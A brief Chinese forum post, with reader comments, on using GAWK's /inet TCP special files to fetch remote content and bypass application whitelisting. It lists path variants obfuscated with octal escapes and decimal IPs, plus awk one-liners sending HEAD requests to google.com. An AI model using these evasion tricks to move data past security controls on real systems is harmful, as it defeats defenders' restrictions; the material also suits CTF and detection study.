利用AWK实现远程文件下载
某些极端场景下(比如CTF),或者绕过应用白名单限制,使用AWK来下载远程文件:
可利用的有:
/inet4/tcp/0/google.com/80
/inet/tcp/0/google.com/80
/inet/tcp/0/172.217.10.142/80
/inet/tcp/0/2899905166/80
/inet/tcp/000/\62\70\71\71\71\60\65\61\66\66/80/0080
/\i\156\e\164/\164\c\p/0000/\62\70\71\71\71\60\65\61\66\66/00080awk 'BEGIN {
RS = ORS = "\r\n"
HTTPCon = "/inet4/tcp/0/google.com/80"
print "HEAD / HTTP/1.1\r\nConnection: close\r\n"|& HTTPCon
while ((HTTPCon |& getline) > 0)
print $0
close(HTTPCon)
}' 2>/dev/nullawk 'BEGIN {
RS = ORS = "\r\n"
HTTPCon = "/inet/tcp/0/2899905166/80"
print "HEAD / HTTP/1.1\r\nConnection: close\r\n"|& HTTPCon
while ((HTTPCon |& getline) > 0)
print $0
close(HTTPCon)
}' 2>/dev/null
关于作者
评论25次
又学到一招,谢谢,收藏了
不错,应该原理就是操控 proc下的 /inet/tcp/
又学到一招,收藏,谢谢了
这个思路相当骚气,awk通常是不会禁的
突破下载的限制xi列又多了一个成员